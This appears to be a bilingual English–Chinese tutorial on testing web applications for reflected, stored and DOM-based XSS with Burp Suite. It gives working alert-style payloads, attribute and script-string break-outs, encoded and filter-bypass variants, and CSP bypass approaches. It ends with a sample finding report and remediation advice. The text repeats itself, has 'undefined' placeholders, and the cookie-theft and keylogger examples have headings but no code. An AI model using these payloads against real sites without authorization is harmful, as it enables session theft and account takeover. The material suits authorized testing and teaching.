Testing for XSS Vulnerabilities with Burp Suite

使用Burp Suite测试XSS漏洞

When to Use

适用场景

During authorized web application penetration testing to find reflected, stored, and DOM-based XSS
When validating XSS findings reported by automated vulnerability scanners
For testing the effectiveness of Content Security Policy (CSP) and XSS filters
When assessing client-side security of single-page applications (SPAs)
During bug bounty programs targeting XSS vulnerabilities

在授权的Web应用渗透测试中查找反射型、存储型和DOM型XSS
验证自动化漏洞扫描器报告的XSS发现
测试内容安全策略（CSP）和XSS过滤器的有效性
评估单页应用（SPA）的客户端安全性
在针对XSS漏洞的漏洞赏金计划中使用

Prerequisites

前置条件

Authorization: Written scope and rules of engagement for the target application
Burp Suite Professional: Licensed version with active scanner capabilities
Browser: Firefox or Chromium with Burp CA certificate installed
FoxyProxy: Browser extension configured to route traffic through Burp proxy (127.0.0.1:8080)
Target application: Authenticated access with valid test credentials
XSS payloads list: Custom wordlist or Burp's built-in XSS payload set

授权：目标应用的书面测试范围和参与规则
Burp Suite Professional：具备激活扫描功能的授权版本
浏览器：安装了Burp CA证书的Firefox或Chromium
FoxyProxy：已配置为通过Burp代理（127.0.0.1:8080）路由流量的浏览器扩展
目标应用：使用有效测试凭证的已认证访问权限
XSS payload列表：自定义词表或Burp内置的XSS payload集合

Workflow

操作流程

Step 1: Configure Burp Suite and Map the Application

步骤1：配置Burp Suite并映射应用

Set up the proxy and crawl the application to discover all input vectors.

undefined

设置代理并爬取应用，以发现所有输入向量。

undefined

Burp Suite Configuration

Proxy > Options > Proxy Listeners: 127.0.0.1:8080
Target > Scope: Add target domain (e.g., *.target.example.com)
Dashboard > New Scan > Crawl only > Select target URL
Enable "Passive scanning" in Dashboard settings

Proxy > Options > Proxy Listeners: 127.0.0.1:8080
Target > Scope: Add target domain (e.g., *.target.example.com)
Dashboard > New Scan > Crawl only > Select target URL
Enable "Passive scanning" in Dashboard settings

Browser Setup

Install Burp CA: http://burpsuite → CA Certificate
Import certificate into browser trust store
Configure proxy: 127.0.0.1:8080
Browse the application manually to build the site map

undefined

Install Burp CA: http://burpsuite → CA Certificate
Import certificate into browser trust store
Configure proxy: 127.0.0.1:8080
Browse the application manually to build the site map

undefined

Step 2: Identify Reflection Points with Burp Repeater

步骤2：使用Burp Repeater识别反射点

Send requests to Repeater and inject unique canary strings to find where user input is reflected.

undefined

将请求发送到Repeater，注入唯一的标记字符串以查找用户输入被反射的位置。

undefined

In Burp Repeater, inject a unique canary string into each parameter:

GET /search?q=xsscanary12345 HTTP/1.1 Host: target.example.com

Check the response for reflections of the canary:

Search response body for "xsscanary12345"

Note the context: HTML body, attribute, JavaScript, URL, etc.

Test multiple injection contexts:

HTML body: <p>Results for: xsscanary12345</p>

Attribute: <input value="xsscanary12345">

JavaScript: var search = "xsscanary12345";

URL context: <a href="/page?q=xsscanary12345">

Test with HTML special characters to check encoding:

GET /search?q=xss<>"'&/ HTTP/1.1 Host: target.example.com

Check which characters are reflected unencoded

undefined

undefined

Step 3: Test Reflected XSS with Context-Specific Payloads

步骤3：使用上下文特定Payload测试反射型XSS

Based on the reflection context, craft targeted XSS payloads.

undefined

根据反射上下文，定制针对性的XSS payload。

undefined

HTML Body Context - Basic payload

GET /search?q=<script>alert(document.domain)</script> HTTP/1.1 Host: target.example.com

HTML Attribute Context - Break out of attribute

GET /search?q=" onfocus=alert(document.domain) autofocus=" HTTP/1.1 Host: target.example.com

JavaScript String Context - Break out of string

GET /search?q=';alert(document.domain)// HTTP/1.1 Host: target.example.com

Event Handler Context - Use alternative events

GET /search?q=<img src=x onerror=alert(document.domain)> HTTP/1.1 Host: target.example.com

SVG Context

GET /search?q=<svg onload=alert(document.domain)> HTTP/1.1 Host: target.example.com

If angle brackets are filtered, try encoding:

GET /search?q=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: target.example.com

undefined

GET /search?q=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: target.example.com

undefined

Step 4: Test Stored XSS via Burp Intruder

步骤4：通过Burp Intruder测试存储型XSS

Use Burp Intruder to test stored XSS across input fields like comments, profiles, and messages.

undefined

使用Burp Intruder测试评论、个人资料和消息等输入字段中的存储型XSS。

undefined

Burp Intruder Configuration:

1. Right-click request > Send to Intruder

2. Positions tab: Mark the injectable parameter

3. Payloads tab: Load XSS payload list

Example payload list for Intruder:

In Intruder > Options > Grep - Match:

Add patterns: "alert(1)", "onerror=", "<script>"

This flags responses where payloads are reflected/stored

undefined

undefined

Step 5: Test DOM-based XSS

步骤5：测试DOM型XSS

Identify client-side JavaScript that processes user input unsafely using Burp's DOM Invader.

undefined

使用Burp的DOM Invader识别不安全处理用户输入的客户端JavaScript。

undefined

Enable DOM Invader in Burp's embedded browser:

1. Open Burp's embedded Chromium browser

2. Click DOM Invader extension icon > Enable

3. Set canary value (e.g., "domxss")

Common DOM XSS sinks to monitor:

- document.write()

- innerHTML

- outerHTML

- eval()

- setTimeout() / setInterval() with string args

- location.href / location.assign()

- jQuery .html() / .append()

Common DOM XSS sources:

- location.hash

- location.search

- document.referrer

- window.name

- postMessage data

Test URL fragment-based DOM XSS:

https://target.example.com/page#<img src=x onerror=alert(1)>

Test via document.referrer:

Create a page that links to the target with XSS in the referrer

undefined

undefined

Step 6: Bypass XSS Filters and CSP

步骤6：绕过XSS过滤器和CSP

When basic payloads are blocked, use advanced techniques to bypass protections.

undefined

当基础payload被拦截时，使用高级技术绕过防护措施。

undefined

CSP Analysis - Check response headers:

Content-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com

Common CSP bypasses:

If 'unsafe-inline' is allowed:

If a CDN is whitelisted (e.g., cdnjs.cloudflare.com):

Filter bypass techniques:

Case variation: <ScRiPt>alert(1)</ScRiPt>

Null bytes: <scr%00ipt>alert(1)</script>

Double encoding: %253Cscript%253Ealert(1)%253C/script%253E

HTML entities: <img src=x onerror=alert(1)>

Unicode escapes: <script>\u0061lert(1)</script>

Use Burp Suite > BApp Store > Install "Hackvertor"

Encode payloads with Hackvertor tags:

<@hex_entities>alert(document.domain)<@/hex_entities>

undefined

undefined

Step 7: Validate Impact and Document Findings

步骤7：验证影响并记录发现

Confirm exploitability and document the full attack chain.

undefined

确认可利用性并记录完整的攻击链。

undefined

Proof of Concept payload that demonstrates real impact:

Cookie theft:

Session hijacking via XSS:

Keylogger payload (demonstrates impact severity):

Screenshot capture using html2canvas (stored XSS impact):

Document each finding with:

- URL and parameter

- Payload used

- Screenshot of alert/execution

- Impact assessment

- Reproduction steps

undefined

undefined

Key Concepts

核心概念

Concept	Description
Reflected XSS	Payload is included in the server response immediately from the current HTTP request
Stored XSS	Payload is persisted on the server (database, file) and served to other users
DOM-based XSS	Payload is processed entirely client-side by JavaScript without server reflection
XSS Sink	A JavaScript function or DOM property that executes or renders untrusted input
XSS Source	A location where attacker-controlled data enters the client-side application
CSP	Content Security Policy header that restricts which scripts can execute on a page
Context-aware encoding	Applying the correct encoding (HTML, JS, URL, CSS) based on output context
Mutation XSS (mXSS)	XSS that exploits browser HTML parser inconsistencies during DOM serialization

概念	描述
Reflected XSS	payload会从当前HTTP请求中直接包含在服务器响应中
Stored XSS	payload会被持久化在服务器（数据库、文件）中，并提供给其他用户
DOM-based XSS	payload完全由客户端JavaScript处理，无需服务器反射
XSS Sink	执行或渲染不可信输入的JavaScript函数或DOM属性
XSS Source	攻击者可控数据进入客户端应用的位置
CSP	限制页面中可执行脚本的内容安全策略标头
Context-aware encoding	根据输出上下文应用正确的编码（HTML、JS、URL、CSS）
Mutation XSS (mXSS)	利用DOM序列化期间浏览器HTML解析器不一致性的XSS

Tools & Systems

工具与系统

Tool	Purpose
Burp Suite Professional	Primary testing platform with scanner, intruder, repeater, and DOM Invader
DOM Invader	Burp's built-in browser extension for DOM XSS testing
Hackvertor	Burp BApp for advanced payload encoding and transformation
XSS Hunter	Blind XSS detection platform that captures execution evidence
Dalfox	CLI-based XSS scanner with parameter analysis ( `go install github.com/hahwul/dalfox/v2@latest` )
CSP Evaluator	Google tool for analyzing Content Security Policy effectiveness

工具	用途
Burp Suite Professional	具备扫描器、入侵者、重放器和DOM Invader的主要测试平台
DOM Invader	Burp内置的浏览器扩展，用于DOM型XSS测试
Hackvertor	用于高级payload编码和转换的Burp BApp插件
XSS Hunter	捕获执行证据的盲XSS检测平台
Dalfox	基于CLI的XSS扫描器，具备参数分析功能（ `go install github.com/hahwul/dalfox/v2@latest` ）
CSP Evaluator	Google推出的用于分析内容安全策略有效性的工具

Common Scenarios

常见场景

Scenario 1: Search Function Reflected XSS

场景1：搜索功能反射型XSS

A search page reflects the query parameter in the results heading without encoding. Inject

<script>alert(document.domain)</script>

in the search parameter and demonstrate cookie theft via reflected XSS.

搜索页面会将查询参数无编码地反射在结果标题中。在搜索参数中注入

<script>alert(document.domain)</script>

，并演示通过反射型XSS窃取Cookie。

Scenario 2: Comment System Stored XSS

场景2：评论系统存储型XSS

A blog comment form sanitizes

<script>

tags but allows

<img>

tags. Use

<img src=x onerror=alert(document.domain)>

to achieve stored XSS that fires for every visitor loading the page.

博客评论表单会过滤

<script>

标签，但允许

<img>

标签。使用

<img src=x onerror=alert(document.domain)>

实现存储型XSS，所有加载该页面的访客都会触发payload。

Scenario 3: SPA with DOM-based XSS

场景3：含DOM型XSS的SPA

A React/Angular SPA reads

window.location.hash

and injects it into the DOM via

innerHTML

. Use DOM Invader to trace the source-to-sink flow and craft a payload in the URL fragment.

某React/Angular SPA会读取

window.location.hash

并通过

innerHTML

注入到DOM中。使用DOM Invader追踪源到 sink 的流程，并在URL片段中构造payload。

Scenario 4: XSS Behind WAF with Strict CSP

场景4：WAF防护下的严格CSP XSS

A WAF blocks common XSS patterns and CSP restricts inline scripts. Discover a JSONP endpoint on a whitelisted domain and use it as a script gadget to bypass CSP.

WAF会拦截常见XSS模式，CSP限制内联脚本。在白名单域名上发现JSONP端点，并将其作为脚本gadget绕过CSP。

Output Format

输出格式

undefined

undefined

XSS Vulnerability Finding

Vulnerability: Stored Cross-Site Scripting (XSS) Severity: High (CVSS 8.1) Location: POST /api/comments →

body

parameter Type: Stored XSS OWASP Category: A03:2021 - Injection

Vulnerability: Stored Cross-Site Scripting (XSS) Severity: High (CVSS 8.1) Location: POST /api/comments →

body

parameter Type: Stored XSS OWASP Category: A03:2021 - Injection

Reproduction Steps

Navigate to https://target.example.com/blog/post/123
Submit a comment with body: <img src=x onerror=alert(document.domain)>
Reload the page; the payload executes in the browser

Navigate to https://target.example.com/blog/post/123
Submit a comment with body: <img src=x onerror=alert(document.domain)>
Reload the page; the payload executes in the browser

Impact

Session hijacking via cookie theft for all users viewing the page
Account takeover through session token exfiltration
Defacement of the blog post page
Phishing via injected login forms

Session hijacking via cookie theft for all users viewing the page
Account takeover through session token exfiltration
Defacement of the blog post page
Phishing via injected login forms

CSP Status

No Content-Security-Policy header present
X-XSS-Protection header not set

No Content-Security-Policy header present
X-XSS-Protection header not set

Recommendation

Implement context-aware output encoding (HTML entity encoding for HTML context)
Deploy Content Security Policy with strict nonce-based script allowlisting
Use DOMPurify library for sanitizing user-generated HTML content
Set HttpOnly and Secure flags on session cookies
Add X-Content-Type-Options: nosniff header

undefined

Implement context-aware output encoding (HTML entity encoding for HTML context)
Deploy Content Security Policy with strict nonce-based script allowlisting
Use DOMPurify library for sanitizing user-generated HTML content
Set HttpOnly and Secure flags on session cookies
Add X-Content-Type-Options: nosniff header

undefined

testing-for-xss-vulnerabilities-with-burpsuite

Original

Translation

Testing for XSS Vulnerabilities with Burp Suite

使用Burp Suite测试XSS漏洞

When to Use

适用场景

Prerequisites

前置条件

Workflow

操作流程

Step 1: Configure Burp Suite and Map the Application

步骤1：配置Burp Suite并映射应用

Burp Suite Configuration

Burp Suite Configuration

Browser Setup

Browser Setup

Step 2: Identify Reflection Points with Burp Repeater

步骤2：使用Burp Repeater识别反射点

In Burp Repeater, inject a unique canary string into each parameter:

In Burp Repeater, inject a unique canary string into each parameter:

Check the response for reflections of the canary:

Check the response for reflections of the canary:

Search response body for "xsscanary12345"

Search response body for "xsscanary12345"

Note the context: HTML body, attribute, JavaScript, URL, etc.

Note the context: HTML body, attribute, JavaScript, URL, etc.

Test multiple injection contexts:

Test multiple injection contexts:

HTML body: <p>Results for: xsscanary12345</p>

HTML body: <p>Results for: xsscanary12345</p>

Attribute: <input value="xsscanary12345">

Attribute: <input value="xsscanary12345">

JavaScript: var search = "xsscanary12345";

JavaScript: var search = "xsscanary12345";

URL context: <a href="/page?q=xsscanary12345">

URL context: <a href="/page?q=xsscanary12345">

Test with HTML special characters to check encoding:

Test with HTML special characters to check encoding:

Check which characters are reflected unencoded

Check which characters are reflected unencoded

Step 3: Test Reflected XSS with Context-Specific Payloads

步骤3：使用上下文特定Payload测试反射型XSS

HTML Body Context - Basic payload

HTML Body Context - Basic payload

HTML Attribute Context - Break out of attribute

HTML Attribute Context - Break out of attribute

JavaScript String Context - Break out of string

JavaScript String Context - Break out of string

Event Handler Context - Use alternative events

Event Handler Context - Use alternative events

SVG Context

SVG Context

If angle brackets are filtered, try encoding:

If angle brackets are filtered, try encoding:

Step 4: Test Stored XSS via Burp Intruder

步骤4：通过Burp Intruder测试存储型XSS

Burp Intruder Configuration:

Burp Intruder Configuration:

1. Right-click request > Send to Intruder

1. Right-click request > Send to Intruder

2. Positions tab: Mark the injectable parameter

2. Positions tab: Mark the injectable parameter

3. Payloads tab: Load XSS payload list

3. Payloads tab: Load XSS payload list

Example payload list for Intruder:

Example payload list for Intruder:

In Intruder > Options > Grep - Match:

In Intruder > Options > Grep - Match:

Add patterns: "alert(1)", "onerror=", "<script>"

Add patterns: "alert(1)", "onerror=", "<script>"

This flags responses where payloads are reflected/stored

This flags responses where payloads are reflected/stored

Step 5: Test DOM-based XSS

步骤5：测试DOM型XSS

Enable DOM Invader in Burp's embedded browser:

Enable DOM Invader in Burp's embedded browser:

1. Open Burp's embedded Chromium browser

1. Open Burp's embedded Chromium browser

2. Click DOM Invader extension icon > Enable

HTML entities: <img src=x onerror=alert(1)>

HTML entities: <img src=x onerror=alert(1)>